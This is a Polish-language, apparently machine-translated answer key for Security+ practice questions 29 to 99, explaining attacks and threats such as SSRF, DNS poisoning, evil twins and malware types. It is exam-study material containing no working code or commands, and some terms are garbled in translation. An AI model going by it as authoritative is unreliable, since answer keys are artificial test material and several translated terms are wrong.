29. B. Rekonesans pasywny to każdy rekonesans przeprowadzony bez faktycznego połączenia z celem. W tym przypadku Jan prowadzi rodzaj OSINT, czyli wywiadu typu open source, używając powszechnie dostępnych zewnętrznych źródeł informacji w celu zebrania informacji o swoim celu. Rekonesans aktywny obejmuje komunikację z siecią docelową, na przykład skanowanie portów. Początkowa eksploatacja nie polega na zbieraniu informacji; faktycznie włamuje się do sieci docelowej. Punkt obrotu ma miejsce wtedy, gdy naruszyłeś jeden system i użyjesz go, aby przejść do innego systemu.
30. A. Próby fałszowania żądań po stronie serwera (SSRF) zazwyczaj próbują uzyskać przekazywanie danych HTTP i nie obejmują wstrzykiwania SQL. Blokowanie wrażliwych nazw hostów, adresów IP i adresów URL to prawidłowe sposoby zapobiegania SSRF, podobnie jak stosowanie filtrów wejściowych opartych na białej liście.
31. A. Ataki zatruwania systemu nazw domen (DNS) próbują wstawić nieprawidłowe lub złośliwe wpisy do zaufanego serwera DNS. Zatruwanie protokołu ARP (Address Resolution Protocol) polega na zmianie tabel MAC-IP w przełączniku. Chociaż skrypty między lokacjami (XSS) i fałszowanie żądań między lokacjami (CSRF lub XSRF) to oba typy ataków, nie jest to atak zatruwania.
32. C. Test w nieznanym środowisku nazywany jest również testem czarnej skrzynki lub testem wiedzy zerowej, ponieważ nie dostarcza informacji wykraczających poza podstawowe informacje potrzebne do zidentyfikowania celu. Znane środowisko lub test białoskrzynkowy polega na przekazaniu testerowi bardzo pełnych informacji. Ten scenariusz jest prawdopodobnie wykonywany spoza sieci, ale test zewnętrzny nie jest poprawną terminologią. Test zagrożeń nie jest terminem używanym w testach penetracyjnych.
33. D. Punkt zwrotny występuje, gdy wykorzystujesz jedną maszynę i używasz jej jako podstawy do atakowania innych systemów. Przestawianie można wykonać na podstawie testów wewnętrznych lub zewnętrznych. Testowanie biało- i czarnoskrzynkowe opisuje ilość informacji, które tester podaje z wyprzedzeniem, a nie sposób, w jaki tester wykonuje test.
34. A. Shimming ma miejsce, gdy atakujący umieszcza złośliwe oprogramowanie między aplikacją a innym plikiem i przechwytuje komunikację z tym plikiem (zwykle do biblioteki lub systemowego API). W wielu przypadkach odbywa się to za pomocą sterownika komponentu sprzętowego. Koń trojański może zostać użyty do wprowadzenia podkładki do systemu, ale nie jest to opisane w tym scenariuszu. Backdoor to sposób na obejście autoryzacji systemu i uzyskanie bezpośredniego dostępu do systemu. Refaktoryzacja to proces zmiany nazw zmiennych, funkcji itd. w programie.
35. C. SOAR jest stosunkowo nową kategorią zdefiniowaną przez Gartnera. Orkiestracja, automatyzacja i reagowanie w zakresie bezpieczeństwa obejmuje zarządzanie zagrożeniami i podatnością, reagowanie na incydenty związane z bezpieczeństwem oraz automatyzację operacji związanych z bezpieczeństwem, ale nie zautomatyzowaną analizę złośliwego oprogramowania.
36. C. Usługi reputacji domeny, takie jak Reputation Authority, Cisco Talos, McAfee trustsource.org i barracudacentral.org strony Barracuda dostarczają dane dotyczące reputacji domeny, które umożliwiają wyszukanie domeny lub adresu IP w celu ustalenia, czy jest ona obecnie na czarnej liście lub została zła reputacja.
37. B. Jego maszyny są częścią rozproszonego ataku typu "odmowa usługi" (DDoS). Ten scenariusz opisuje ogólny atak DDoS, a nie konkretny, taki jak SYN flood, który wymagałby wysyłania wielu pakietów SYN bez pełnego trójstronnego uzgadniania TCP. Maszyny te mogą być częścią botnetu lub mogą mieć po prostu wyzwalacz, który powoduje, że rozpoczynają atak w określonym czasie. Prawdziwym kluczem w tym scenariuszu jest atak DDoS. Wreszcie backdoor daje atakującemu dostęp do systemu docelowego.
38. B. Ponieważ otwarte hotspoty Wi-Fi nie mają możliwości udowodnienia, że są legalne, można je łatwo sfałszować. Atakujący mogą przeciwstawić się fałszywej wersji hotspotu, a następnie przeprowadzić atak polegający na usuwaniu SSL, włączając się w sesje, które ofiary próbują otworzyć na bezpiecznych serwerach.
39. B. Koń trojański dołącza złośliwy program do legalnego programu. Gdy użytkownik pobierze i zainstaluje legalny program, dostaje złośliwe oprogramowanie. Bomba logiczna to złośliwe oprogramowanie, które popełnia swoje złe uczynki, gdy zostanie spełniony pewien warunek. Rootkit to złośliwe oprogramowanie, które uzyskuje dostęp administracyjny lub root. Wirus makr to wirus osadzony w dokumencie jako makro.
40. D. Wielorybnictwo ma na celu konkretną osobę, która jest ważna w organizacji, taką jak prezes lub dyrektor finansowy (CFO). Spear phishing jest wymierzony w określone osoby lub grupy, ale wielorybnictwo jest bardziej specyficzne pod względem ważności zaangażowanych osób. Ukierunkowany phishing nie jest terminem używanym w branży. Wyłudzanie informacji to ogólny termin określający szeroką gamę powiązanych ataków i na tego typu pytania należy wybrać najdokładniejszą odpowiedź.
41. D. Syndykaty przestępcze mogą produkować, sprzedawać i wspierać narzędzia do złośliwego oprogramowania lub mogą je samodzielnie wdrażać. Złośliwe oprogramowanie kryptograficzne i inne pakiety to przykłady narzędzi często tworzonych i używanych przez syndykaty przestępcze. Podmioty państwowe są częściej kojarzone z zaawansowanymi trwałymi zagrożeniami (APT) mającymi na celu osiągnięcie celów państwa narodowego, które ich wspiera. Haktywiści zazwyczaj mają motywacje polityczne, podczas gdy dzieciaki skryptowe mogą po prostu być w nich dla uznania lub zabawy.
42. A. Tęczowa tablica to tablica wstępnie obliczonych skrótów, używana do pobierania haseł. Backdoor służy do uzyskania dostępu do systemu, a nie do odzyskiwania haseł. W celu uzyskania dostępu do haseł można wykorzystać zarówno socjotechnikę, jak i ataki słownikowe, ale nie są to tabele wstępnie obliczonych skrótów.
43. B. Najczęstsze obawy, które pojawią się, gdy sprzedawca nie ma dłuższego wsparcia urządzenia to brak aktualizacji lub poprawek. Dotyczy to szczególnie sytuacji, gdy urządzenia są technologią operacyjną, taką jak urządzenia, oświetlenie lub inne urządzenia sterujące infrastrukturą, które mają bardzo długi cykl życia i kontrolują ważne procesy lub systemy. Chociaż niewłaściwe przechowywanie danych, brak dokumentacji i problemy z konfiguracją mogą być problemami, brak aktualizacji i poprawek pozostaje największym i najczęstszym problemem.
44. A. Bluejacking polega na wysyłaniu niechcianych wiadomości do urządzeń Bluetooth, gdy znajdują się one w zasięgu. Bluesnarfing polega na pobieraniu danych z urządzenia Bluetooth. Atak złych bliźniaków wykorzystuje nieuczciwy punkt dostępowy, którego nazwa jest podobna lub identyczna z nazwą legalnego punktu dostępowego.
45. A. Ponieważ Dennis jest w stanie przeglądać ruch sieciowy przed wysłaniem go do rzeczywistego serwera, powinien być w stanie przeprowadzić atak na hasło w postaci zwykłego tekstu poprzez przechwycenie hasła. Ataki typu pass-the-hash są zwykle używane w środowiskach Windows, wstrzyknięcie SQL mogłoby zaatakować serwer, a skrypty między lokacjami są możliwe, ale nie tak prawdopodobne, jak atak z hasłem w postaci zwykłego tekstu w tym scenariuszu.
46. A. Nurkowanie w śmietniku to termin przeszukiwania odpadów/śmieci w celu odzyskania przydatnych dokumentów lub materiałów. Testerzy penetracyjne i osoby atakujące mogą w ramach swoich wysiłków skakać w śmietniku. W rzeczywistości opróżnianie pojemników na śmieci w danym miejscu może dostarczyć przydatnych informacji nawet bez wskakiwania do śmietnika! Nurkowanie na śmieciach i inżynieria śmieci nie są terminami używanymi w branży. Nic w tym scenariuszu nie opisuje socjotechniki.
47. A. Jest to trojan zdalnego dostępu (RAT), złośliwe oprogramowanie, które otwiera komuś zdalny dostęp do systemu. Robak rozprzestrzeniłby się poprzez lukę, podczas gdy bomba logiczna uruchamia się, gdy spełniony jest jakiś warunek logiczny. Wreszcie, rootkit zapewnia dostęp administratora lub administratora do systemu.
48. B. Exploity dnia zerowego są nowe i nie znajdują się w definicjach wirusów dla programów antywirusowych (AV). To sprawia, że są trudne do wykrycia, z wyjątkiem ich zachowania. RAT, robaki i rootkity są bardziej narażone na wykrycie przez programy antywirusowe.
49. D. Ataki wykorzystujące identyfikatory częstotliwości radiowych (RFID) zazwyczaj koncentrują się na przechwytywaniu danych, fałszowaniu danych RFID lub przeprowadzaniu ataku typu "odmowa usługi". Ataki urodzinowe są wykorzystywane przeciwko kryptosystemom, które mogą być częścią środowiska tagów RFID, ale nie są powszechnym atakiem na systemy RFID.
50. C. Wektory inicjujące są używane z szyframi strumieniowymi. Atak IV próbuje wykorzystać lukę w celu użycia IV do ujawnienia zaszyfrowanych danych. Nic w tym scenariuszu nie wymaga ani nie opisuje nieuczciwego punktu dostępowego/złego bliźniaka. Wi-Fi Protected Setup (WPS) używa kodu PIN do łączenia się z bezprzewodowym punktem dostępowym (WAP). Atak WPS próbuje przechwycić przesyłany kod PIN, połączyć się z WAP, a następnie ukraść hasło WPA2.
51. C. Niniejszy opis nie obejmuje żadnego ryzyka związanego z dostępnością, ponieważ nie ma informacji o tym, że systemy lub usługi są wyłączone lub niedostępne. Ten scenariusz prawdopodobnie miałby wpływ na reputację, finanse i utratę danych dla firmy Scotta.
52. B. Cross-site request forgery (XSRF lub CSRF) wysyła fałszywe żądania do witryny, która rzekomo pochodzi od zaufanego, uwierzytelnionego użytkownika. Skrypty między witrynami (XSS) wykorzystują zaufanie użytkownika do witryny i osadzają w niej skrypty. Bluejacking to atak Bluetooth. Nic w tym scenariuszu nie wymaga ani nie opisuje złego bliźniaka, który jest atakiem wykorzystującym złośliwy punkt dostępu, który duplikuje legalny punkt dostępowy.
53. A. Fuzja cyberinteligencji to proces gromadzenia, analizowania, a następnie dystrybucji informacji między różnymi agencjami i organizacjami. Centra fuzji, takie jak te obsługiwane przez Departament Bezpieczeństwa Wewnętrznego USA (DHS), koncentrują się na wzmocnieniu wspólnych działań wywiadowczych. Nie są one specjalnie przeznaczone do budowania narzędzi poprzez łączenie innych narzędzi, chociaż w niektórych przypadkach mogą. Nie są elektrowniami i skupiają się na gromadzeniu i udostępnianiu informacji, a nie budowaniu struktury klasyfikacyjnej.
54. B. Lista Common Vulnerabilities and Exposures (CVE) zawiera wpisy, które opisują i zawierają odniesienia do publicznie znanych luk w zabezpieczeniach cybernetycznych. Kanał CVE dostarczy zaktualizowanych informacji o nowych lukach w zabezpieczeniach oraz przydatny numer indeksu, który można odnieść do innych usług.
55. B. Atak urodzinowy wykorzystuje problem urodzin w teorii prawdopodobieństwa i polega na znalezieniu kolizji między przypadkowymi próbami ataku a liczbą potencjalnych permutacji rozwiązania. Ataki urodzinowe to jedna z metod atakowania funkcji skrótu kryptograficznego. Nie są one atakiem socjotechnicznym, atakiem typu "odmowa usługi" ani atakiem na protokół TCP/IP.
56. B. To przykład ataku dysocjacyjnego. Pakiet deauthentication powoduje rozłączenie systemu Juanity, a atakujący może następnie wykonać drugi atak, którego celem jest jej dane uwierzytelniające lub inne dane bezprzewodowe, wykorzystując atak złych bliźniaków. Błędna konfiguracja nie spowoduje deauthentication uwierzytelnionych użytkowników. Przejęcie sesji polega na przejęciu sesji uwierzytelnionej. Backdoory to wbudowane metody obchodzenia uwierzytelniania.
57. A. Ataki słownikowe wykorzystują listę słów, które są uważane za prawdopodobne hasła. Tabela tęczy to wstępnie obliczona tabela hashów. Brute force próbuje każdej możliwej przypadkowej kombinacji. Jeśli atakujący dysponuje oryginalnym zwykłym tekstem i zaszyfrowanym tekstem wiadomości, może określić przestrzeń klucza używaną przez próby bruteforce ukierunkowane na przestrzeń klucza. Przejęcie sesji ma miejsce, gdy osoba atakująca przejmuje uwierzytelnioną sesję.
58. B. Ataki typu downgrade mają na celu sprawienie, aby połączenie Transport Layer Security (TLS) używało słabszej wersji szyfru, co pozwala atakującemu łatwiej złamać szyfrowanie i odczytać chronione dane. W ataku z odłączeniem osoba atakująca próbuje zmusić ofiarę do odłączenia się od zasobu. Przejęcie sesji ma miejsce, gdy osoba atakująca przejmuje uwierzytelnioną sesję. Brute-force próbuje każdą możliwą losową kombinację uzyskać hasło lub klucz szyfrowania.
59. D. Kolizja ma miejsce, gdy dwa różne dane wejściowe wytwarzają ten sam skrót. Tęczowa tablica to tablica wstępnie obliczonych skrótów. Brute force próbuje każdą możliwą losową kombinację uzyskać hasło lub klucz szyfrowania. Przejęcie sesji ma miejsce, gdy osoba atakująca przejmuje uwierzytelnioną sesję.
60. C. Zaawansowane trwałe zagrożenie (APT) obejmuje wyrafinowane (tj. zaawansowane) ataki rozłożone w czasie (tj. uporczywe). Rozproszona odmowa usługi (DDoS) może być częścią APT, ale sama w sobie raczej nie jest APT. Brute force próbuje każdą możliwą losową kombinację uzyskać hasło lub klucz szyfrowania. W ataku z odłączeniem osoba atakująca próbuje zmusić ofiarę do odłączenia się od zasobu.
61. B. Phishing nie jest powszechnie wykorzystywany do pozyskiwania adresów e-mail. W większości przypadków wiadomości phishingowe są ukierunkowane na dane osobowe i poufne informacje, takie jak hasła i numery kart kredytowych.
62. A. Gdy system IDS lub program antywirusowy myli legalny ruch z atakiem, nazywa się to fałszywym alarmem. Fałszywy negatyw występuje wtedy, gdy system IDS pomyli atak z legalnym ruchem. Jest to przeciwieństwo fałszywych alarmów. Opcje C i D są niepoprawne. Chociaż mogą one być poprawne gramatycznie, nie są to terminy używane w branży. W operacjach wojskowych operacje fałszywej flagi próbują przenieść winę na inną firmę, a zatem "fałszywą flagę".
63. B. Keylogger to oprogramowanie lub narzędzie sprzętowe używane do przechwytywania naciśnięć klawiszy. Keyloggery są często wykorzystywane przez osoby atakujące do przechwytywania poświadczeń i innych poufnych informacji. Rootkit służy do uzyskiwania i utrzymywania praw administracyjnych w systemie, a robak to samorozprzestrzeniająca się forma złośliwego oprogramowania, które często atakuje podatne na ataki usługi w sieci w celu rozprzestrzeniania się.
64. A. Terminem określającym próbę uzyskania jakichkolwiek przywilejów wykraczających poza to, co posiadasz, jest eskalacja przywilejów. Przejęcie sesji polega na przejęciu sesji uwierzytelnionej. Chwytanie korzeni i wspinanie się nie są terminami używanymi w branży.
65. B. Ataki typu MAC flooding próbują przepełnić tabelę CAM przełącznika, powodując, że przełącznik wysyła cały ruch do wszystkich portów, a nie do portu, z którym powiązany jest dany adres MAC. Chociaż było to możliwe w przypadku wielu starszych przełączników, większość nowoczesnych przełączników jest mniej podatna na tego typu ataki, a niektóre mają wbudowane zabezpieczenia zapobiegające tego typu atakom.
66. B. Spyware i adware są powszechnymi przykładami PUP lub potencjalnie niechcianymi programami. Chociaż nie są bezpośrednio złośliwe, mogą stanowić zagrożenie dla prywatności użytkownika, a także powodować irytujące, takie jak wyskakujące okienka lub inne niepożądane zachowania. Trojany wydają się być legalnymi programami lub są z nimi sparowane, RAT zapewniają zdalny dostęp i są podkategorią trojanów, a ransomware żąda zapłaty lub innych działań w celu uniknięcia uszkodzenia plików lub reputacji.
67. C. Sytuacja wyścigu może wystąpić, gdy wiele wątków w aplikacji używa tej samej zmiennej i sytuacja nie jest właściwie obsługiwana. Opcja A jest nieprawidłowa. Przepełnienie bufora próbuje umieścić w buforze więcej danych, niż jest przeznaczone do przechowywania. Opcja B jest nieprawidłowa. Bomba logiczna to złośliwe oprogramowanie, które wykonuje swoje złe uczynki, gdy spełniony jest jakiś warunek logiczny. Opcja D jest nieprawidłowa. Jak sama nazwa wskazuje, niewłaściwa obsługa błędów to brak odpowiednich lub odpowiednich mechanizmów obsługi błędów w oprogramowaniu.
68. B. Szkodliwe oprogramowanie w tym przykładzie to koń trojański - udaje, że jest czymś pożądanym lub przynajmniej nieszkodliwym, i instaluje złośliwe oprogramowanie oprócz lub zamiast pożądanego oprogramowania. Rootkit daje dostęp administratora lub administratora, oprogramowanie szpiegujące to złośliwe oprogramowanie, które rejestruje działania użytkowników, a wirus sektora rozruchowego to wirus, który infekuje sektor rozruchowy dysku twardego.
69. B. Serwer Postgres jest konfigurowany przy użyciu słabego hasła dla użytkownika postgres, loginu administracyjnego do bazy danych. Jest to forma niezabezpieczonego konta administracyjnego lub konta root. Co ciekawe, nie jest to ustawienie domyślne, ponieważ Postgres domyślnie nie używa hasła do konta Postgres - jest to jeszcze gorsze ustawienie niż używanie postgresa jako hasła, ale niewiele!
70. A. Annie przesunęła się na boki. Ruch boczny przenosi się do systemów na tym samym poziomie zaufania. Może to zapewnić dostęp do nowych danych lub różnych widoków sieci w zależności od konfiguracji systemów i zabezpieczeń. Eskalacja uprawnień wiąże się z uzyskaniem dodatkowych uprawnień, często uprawnień użytkownika administracyjnego. Ruch w pionie jest czasem odnoszony podczas uzyskiwania dostępu do systemów lub kont o wyższym poziomie bezpieczeństwa lub zaufania. W związku z tym pytaniem wymyślono zachowanie przywilejów.
71. A. To jest przykład fałszywie pozytywnego. Fałszywy alarm może spowodować, że luka w zabezpieczeniach będzie wskazywać, że tak naprawdę jej nie było. Czasami dzieje się tak, gdy poprawka lub poprawka jest zainstalowana, ale aplikacja nie zmienia się w sposób, który pokazuje zmianę, i był to problem z aktualizacjami, w których numer wersji jest podstawowym testem pod kątem luki. Gdy skaner podatności wykryje numer wersji, która zawiera lukę, ale została zainstalowana poprawka, która go nie aktualizuje, może wystąpić fałszywy pozytywny raport. Fałszywy negatyw zgłosi poprawkę lub poprawkę, w której faktycznie istniała luka. Nie wspomniano o automatycznych aktualizacjach, ani o konkretnej wersji Apache.
72. C. Przepełnienie bufora jest możliwe, gdy granice nie są sprawdzane, a atakujący próbuje umieścić więcej danych niż zmienna może pomieścić. Cross-site scripting (XSS) to atak na strony internetowe. Cross-site request forgery (CSRF) to atak na stronę internetową. Bomba logiczna to złośliwe oprogramowanie, które wykonuje swoje złe uczynki, gdy spełniony jest jakiś warunek.
73. C. Konsensus, czasami nazywany dowodem społecznym, jest zasadą inżynierii społecznej, która wykorzystuje fakt, że ludzie często chcą ufać grupom innych ludzi. W tym przypadku napastnicy umieścili fałszywe informacje, że oprogramowanie jest godne zaufania, umożliwiając w ten sposób celom "udowodnienie" sobie, że mogą bezpiecznie zainstalować oprogramowanie. Niedobór wykorzystuje przekonanie, że coś może być niedostępne lub rzadkie, a zatem pożądane. Znajomość wykorzystuje zaufanie, jakim ludzie obdarzają osoby i organizacje, które już znają. Ataki oparte na zaufaniu wykorzystują poczucie wiarygodności.
74. B. Bomba logiczna wykonuje złośliwe działania, gdy zostanie spełniony określony warunek lub warunki. Wirus sektora rozruchowego infekuje sektor rozruchowy dysku twardego. Przepełnienie bufora występuje, gdy atakujący próbuje umieścić w zmiennej więcej danych, niż może pomieścić. Rzadki wirus infekujący wykonuje swoją złośliwą aktywność sporadycznie, aby utrudnić jego wykrycie.
75. B. Pozyskiwanie, czyli proces pozyskiwania informacji poprzez rozmowę w celu zebrania przydatnych informacji, jest kluczowym narzędziem w arsenale socjotechniki testerów penetracyjnych. Preteksty polegają na wykorzystaniu wiarygodnych powodów, aby cel zgadzał się z tym, co próbuje zrobić socjotechnika. Podszywanie się polega na zachowywaniu się jak ktoś, kim nie jesteś, podczas gdy zastraszanie próbuje przestraszyć lub zagrozić celowi, aby zrobił to, czego oczekuje od niego inżynier społeczny.
76. B. Wszystkie te protokoły są niezabezpieczone. FTP został zastąpiony przez bezpieczne wersje w niektórych zastosowaniach (SFTP/FTPS), podczas gdy Telnet został zastąpiony przez SSH w nowoczesnych aplikacjach. RSH jest przestarzały i powinien być widziany tylko w naprawdę starych systemach. Jeśli znajdziesz system lub urządzenie ujawniające te protokoły, będziesz musiał zagłębić się dalej, aby ustalić, dlaczego są one narażone i jak można je chronić, jeśli muszą pozostać otwarte z uzasadnionego powodu.
77. B. Najlepszym sposobem, aby Scott mógł określić, skąd można uzyskać dostęp do sieci bezprzewodowych organizacji, jest użycie technik prowadzenia wojny, latania wojennego i/lub prowadzenia działań wojennych w celu wyznaczenia zasięgu sygnału bezprzewodowego organizacji. OSINT i aktywne skanowanie byłyby przydatne w zbieraniu informacji o organizacji i jej systemach, ale nie o zasięgu i dostępności sieci bezprzewodowych, a socjotechnika jest bardziej przydatna do gromadzenia informacji lub uzyskiwania dostępu do obiektów lub systemów.
78. A. Wirus makr to złośliwy skrypt (makro) osadzony w pliku, zazwyczaj pliku Microsoft Office. Są one zazwyczaj napisane w skrypcie Visual Basic for Applications (VBA). Wirus sektora rozruchowego infekuje sektor rozruchowy dysku twardego. Koń trojański to złośliwe oprogramowanie powiązane z legalnym programem. W tym scenariuszu złośliwe oprogramowanie jest w rzeczywistości osadzone w dokumencie pakietu Office. Oba są podobne, ale nie takie same. Trojan zdalnego dostępu (RAT) to koń trojański, który umożliwia atakującemu zdalny dostęp do komputera.
79. C. Podając loginy testera, pozwalasz mu na przeprowadzenie skanowania poświadczeń (tj. skanowania z kontem lub kontami, które umożliwiają im dostęp w celu sprawdzenia ustawień i konfiguracji). Znane i częściowo znane testy środowiskowe opisują poziom wiedzy testera o sieci. Skanowanie uprawnień nie może być testem w nieznanym środowisku, ale może być znane lub częściowo znane. Skanowanie inwazyjne to termin używany w odniesieniu do skanowań, które mają na celu sprawdzenie lub wykorzystanie znalezionej luki zamiast próby uniknięcia szkód.
80. B. Egzamin Security+ oczekuje, że praktycy będą w stanie analizować skrypty i kod, aby w przybliżeniu określić, jaką funkcję pełnią, oraz być w stanie zidentyfikować wiele języków programowania. Python opiera się na formatowaniu, takim jak wcięcia, do wskazywania bloków kodu i nie używa wskaźników końca linii, jak w niektórych językach. Ten kod jest podstawowym skanerem portów Pythona, który skanuje każdy port od 1 do 9999, sprawdzając, czy umożliwia połączenie.
81. C. Botnety są często wykorzystywane do przeprowadzania ataków DDoS, przy czym atak pochodzi jednocześnie ze wszystkich komputerów w botnecie. Ataki phishingowe mają na celu nakłonienie użytkownika do podania informacji, kliknięcia łącza lub otwarcia załącznika. Adware składa się z niechcianych reklam pop-up. Koń trojański dołącza złośliwe oprogramowanie do legalnego programu.
82. B. Amanda odkryła zagrożenie wewnętrzne. Zagrożenia wewnętrzne mogą być trudne do wykrycia, ponieważ złośliwy administrator lub inny uprzywilejowany użytkownik często ma możliwość ukrycia swoich działań lub może być osobą, której zadaniem jest polowanie na takie zagrożenia! To nie jest zero-day - nie wspomniano o luce, nie było błędnej konfiguracji, ponieważ było to zamierzone działanie, a szyfrowanie nie jest wspomniane ani dyskutowane.
83. B. Kampanie wpływu w mediach społecznościowych mają na celu osiągnięcie celów atakującego lub właściciela kampanii. Wykorzystują media społecznościowe za pomocą botów i grup plakatów, aby wspierać pomysły, koncepcje lub przekonania, które są zgodne z celami kampanii. Podszywanie się to rodzaj ataku socjotechnicznego, w którym atakujący udaje kogoś innego. Atak wodopoju umieszcza złośliwe oprogramowanie lub złośliwy kod w witrynie lub witrynach często odwiedzanych przez grupę docelową. Wojna asymetryczna to wojna między grupami o znacząco różnej sile lub możliwościach.
84. C. Używanie ustawień domyślnych jest formą słabej konfiguracji. Wiele skanerów luk w zabezpieczeniach i narzędzi do ataków ma wbudowane ustawienia domyślne do testowania, a ustawienia domyślne można łatwo uzyskać dla większości urządzeń za pomocą szybkiego wyszukiwania w Internecie. Konfiguracja kont nie jest problemem; zmiana domyślnych haseł i ustawień jest. Chociaż szkolenie użytkowników jest ważne, nie o to chodzi w tym scenariuszu. Systemy łatania są ważne, ale to nie zmieni ustawień domyślnych.
85. D. We wstrzyknięciu DLL złośliwe oprogramowanie próbuje wstrzyknąć kod do procesu pewnej biblioteki. To dość zaawansowany atak. Opcja A jest nieprawidłowa. Bomba logiczna wykonuje swój występek, gdy zostanie spełniony pewien warunek. Opcja B jest nieprawidłowa. Przejęcie sesji polega na przejęciu sesji uwierzytelnionej. Opcja C jest nieprawidłowa. Przepełnienie bufora odbywa się poprzez wysłanie większej ilości danych do zmiennej, niż może pomieścić.
86. B. Podmioty państwowe (lub podmioty państwowe) często dysponują większymi zasobami i umiejętnościami, co sprawia, że stanowią większe zagrożenie i znacznie częściej są kojarzeni z zaawansowanym, trwałym podmiotem zagrażającym. Dzieciaki skryptowe, haktywiści i zagrożenia wewnętrzne są zwykle mniej zdolne i znacznie rzadziej są kojarzone z APT.
87. C. Intruzywne skanowanie próbuje aktywnie wykorzystać luki w zabezpieczeniach, a tym samym może spowodować pewne zakłócenia operacji. Z tego powodu powinno być prowadzone poza normalnymi godzinami pracy lub w środowisku testowym, jeśli w ogóle jest używane. Skanowanie nieinwazyjne próbuje zidentyfikować luki w zabezpieczeniach bez ich wykorzystywania. Test penetracyjny w rzeczywistości próbuje włamać się do sieci, wykorzystując luki w zabezpieczeniach. Audyt to przede wszystkim sprawdzenie dokumentów. Zarówno inwazyjne, jak i nieinwazyjne skanowanie luk w zabezpieczeniach może być skuteczne w znajdowaniu luk w zabezpieczeniach.
88. C. Backdoor to metoda na ominięcie normalnych zabezpieczeń i bezpośredni dostęp do systemu. Bomba logiczna to złośliwe oprogramowanie, które wykonuje swoje złe uczynki, gdy spełniony jest jakiś warunek. Koń trojański opakowuje szkodliwy program w legalny program. Gdy użytkownik pobierze i zainstaluje legalny program, dostaje złośliwe oprogramowanie. Rootkit to złośliwe oprogramowanie, które uzyskuje uprawnienia roota lub administratora.
89. D. Fakt, że strona internetowa jest zniszczona w sposób związany z opinią publiczną firmy wskazuje, że napastnicy najprawdopodobniej angażowali się w haktywizm, aby przedstawić argumenty polityczne lub oparte na przekonaniach. Skrypty, aktorzy państw narodowych i przestępczość zorganizowana nie wyjaśniają oświadczeń sprzecznych z polityką firmy, dlatego prawdziwą przyczyną jest haktywizm.
90. A. Pharming próbuje przekierować ruch przeznaczony dla legalnej witryny na inną złośliwą witrynę. Atakujący najczęściej robią to, zmieniając lokalny plik hosts lub wykorzystując zaufany serwer DNS.
91. B. Rozpylanie haseł jest specyficznym rodzajem ataku typu brute force, który wykorzystuje mniejszą listę typowych haseł dla wielu kont, aby spróbować się zalogować. Chociaż brutalne forsowanie jest technicznie poprawne, najlepszym rozwiązaniem jest tu rozpylanie haseł. Kiedy natkniesz się na takie pytania w teście, upewnij się, że podajesz najdokładniejszą odpowiedź, a nie taką, która pasuje, ale może nie być najlepszą odpowiedzią. Ataki polegające na ograniczonym logowaniu to wymyślona odpowiedź, a obracanie konta odnosi się do zmiany hasła do konta, często z powodu włamania lub uniemożliwienia użytkownikowi ponownego zalogowania się do niego przy jednoczesnym zachowaniu konta.
92. C. Chociaż można przypuszczać, że atakujący z państwa narodowego (zwykły napastnik stojący za zaawansowanym, trwałym zagrożeniem) zaatakowałby z obcego adresu IP, często używają skompromitowanego adresu w kraju docelowym jako podstawy ataków. Wszystkie opcje A, B i D są nieprawidłowe. W rzeczywistości są to oznaki zaawansowanego trwałego zagrożenia.
93. B. Atak polegający na eskalacji uprawnień może nastąpić poziomo, gdy atakujący uzyskują podobny poziom uprawnień, ale dla innych użytkowników, lub pionowo, gdy uzyskują bardziej zaawansowane uprawnienia. W tym przypadku Charles odkrył atak pionowej eskalacji uprawnień, który umożliwił atakującemu uzyskanie praw administracyjnych. Cros ssite script i wstrzykiwanie SQL są powszechnymi typami ataków na aplikacje internetowe, a sytuacja wyścigu występuje, gdy dane można zmienić między ich sprawdzeniem a użyciem.
94. A. Złe bliźniacze ataki wykorzystują złośliwy punkt dostępowy skonfigurowany tak, aby wyglądał identycznie jak legalny punkt dostępowy. Atakujący czekają, aż ich cele połączą się przez złego bliźniaka, a następnie mogą przechwytywać lub modyfikować ruch w dowolny sposób. Spoofing IP wykorzystuje adres IP systemu znajdującego się już w sieci, konie trojańskie to złośliwe oprogramowanie, które wydaje się być legalnym oprogramowaniem lub plikami, a eskalacja uprawnień to proces wykorzystywania exploitów w celu uzyskania wyższych uprawnień.
95. A. Exploit lub atak dnia zerowego ma miejsce, zanim sprzedawca się o tym zorientuje. Pozostałe odpowiedzi nie opisują dokładnie ataku dnia zerowego - tylko dlatego, że nie został jeszcze naruszony, nie oznacza, że jest to atak dnia zerowego, ani też nie jest z konieczności szybki do wykorzystania. Wreszcie atak dnia zerowego nie określa, jak długo atakujący może mieć dostęp.
96. D. Prepending jest jednym z dziwniejszych terminów pojawiających się na egzaminie Security+ i nie jest powszechnie używanym zwrotem w branży. Dlatego musisz wiedzieć, że gdy jest używany na tym egzaminie, może oznaczać jedną z trzech rzeczy: dodanie wyrażenia lub frazy do wiadomości e-mail, wiersza tematu lub nagłówka w celu ochrony lub oszukania użytkowników. Zauważają również, że można go użyć podczas dodawania danych w ramach ataku oraz że inżynierowie społeczni mogą "dołączyć" informacje, wstawiając je do rozmowy, aby skłonić cele do myślenia o rzeczach, o których chce napastnik. Preteksowanie to technika socjotechniczna, w której atakujący używają powodu, który ma być wiarygodny dla celu za to, co robią. Wstrzykiwanie SQL to próby dodania kodu SQL do zapytania internetowego w celu uzyskania dodatkowego dostępu lub danych. Używane jest opóźnianie aby objąć szeroką gamę technik w zarysie egzaminu Security+, które koncentrują się na dodawaniu informacji lub danych do istniejącej treści.
97. D. Chociaż audyt niektórych bibliotek lub bibliotek opracowanych na zamówienie dla kodu jest powszechny, audyt wszystkich bibliotek używanych w kodzie jest mało prawdopodobny, z wyjątkiem wyjątkowych sytuacji. Pozostała część tych praktyk jest powszechnie stosowana podczas pracy z zewnętrznymi zespołami programistycznymi.
98. C. Zatrucie DNS występuje, gdy fałszywe informacje DNS są umieszczane na legalnych serwerach DNS, co powoduje przekierowanie ruchu do niechcianych lub złośliwych witryn. Backdoor zapewnia dostęp do systemu poprzez obejście normalnego uwierzytelniania. APT to zaawansowane trwałe zagrożenie. Koń trojański wiąże szkodliwy program z legalnym programem.
99. C. Spyware i adware są powszechnymi przykładami PUP lub potencjalnie niechcianego programu. CAT został wymyślony na to pytanie i nie jest powszechną kategoryzacją złośliwego oprogramowania, podczas gdy robaki to samorozprzestrzeniające się złośliwe oprogramowanie, które często wykorzystuje luki w zabezpieczeniach do rozprzestrzeniania się za pośrednictwem sieci. Trojany udają legalne oprogramowanie lub są połączone z legalnym oprogramowaniem, aby uzyskać dostęp do systemu lub urządzenia.
